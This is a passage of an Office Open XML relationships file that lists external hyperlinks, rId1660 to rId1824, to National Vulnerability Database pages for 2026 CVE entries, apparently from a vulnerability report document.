TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75132" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75163" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75164" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75793" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78701" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78970" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId1699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81666" TargetMode="External" Id="rId1700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId1701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId1702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId1704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82123" TargetMode="External" Id="rId1705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82299" TargetMode="External" Id="rId1706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84204" TargetMode="External" Id="rId1707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId1708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84327" TargetMode="External" Id="rId1709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId1711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85044" TargetMode="External" Id="rId1712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85162" TargetMode="External" Id="rId1713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85769" TargetMode="External" Id="rId1714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId1715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId1716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId1717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId1718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86255" TargetMode="External" Id="rId1719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId1722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId1723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9186" TargetMode="External" Id="rId1724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId1725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18404" TargetMode="External" Id="rId1726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId1727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3853" TargetMode="External" Id="rId1728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76573" TargetMode="External" Id="rId1734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId1735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85414" TargetMode="External" Id="rId1738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8623" TargetMode="External" Id="rId1739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8625" TargetMode="External" Id="rId1740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId1741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6217" TargetMode="External" Id="rId1742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67278" TargetMode="External" Id="rId1743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70405" TargetMode="External" Id="rId1744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70409" TargetMode="External" Id="rId1745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71562" TargetMode="External" Id="rId1746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75168" TargetMode="External" Id="rId1747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId1748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId1750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82729" TargetMode="External" Id="rId1753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83610" TargetMode="External" Id="rId1754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId1755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId1756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85084" TargetMode="External" Id="rId1758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85592" TargetMode="External" Id="rId1759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86186" TargetMode="External" Id="rId1760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18874" TargetMode="External" Id="rId1762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19795" TargetMode="External" Id="rId1763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71832" TargetMode="External" Id="rId1764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81859" TargetMode="External" Id="rId1765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85547" TargetMode="External" Id="rId1766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId1767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18330" TargetMode="External" Id="rId1768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18843" TargetMode="External" Id="rId1769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19727" TargetMode="External" Id="rId1770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId1771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32773" TargetMode="External" Id="rId1772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52773" TargetMode="External" Id="rId1773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52774" TargetMode="External" Id="rId1774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56706" TargetMode="External" Id="rId1775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71403" TargetMode="External" Id="rId1778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75586" TargetMode="External" Id="rId1779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId1781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77818" TargetMode="External" Id="rId1782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId1783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId1784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId1785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80180" TargetMode="External" Id="rId1786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80190" TargetMode="External" Id="rId1787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8447" TargetMode="External" Id="rId1788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85229" TargetMode="External" Id="rId1789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86254" TargetMode="External" Id="rId1793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17610" TargetMode="External" Id="rId1794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId1795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74994" TargetMode="External" Id="rId1796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77123" TargetMode="External" Id="rId1797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId1798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId1799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId1804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55854" TargetMode="External" Id="rId1805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55856" TargetMode="External" Id="rId1806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55857" TargetMode="External" Id="rId1807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55858" TargetMode="External" Id="rId1808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55859" TargetMode="External" Id="rId1809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55860" TargetMode="External" Id="rId1810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId1814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId1815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId1818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80438" TargetMode="External" Id="rId1820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81347" TargetMode="External" Id="rId1821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82752" TargetMode="External" Id="rId1822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84185" TargetMode="External" Id="rId1823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85534" TargetMode="External" Id="rId1824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 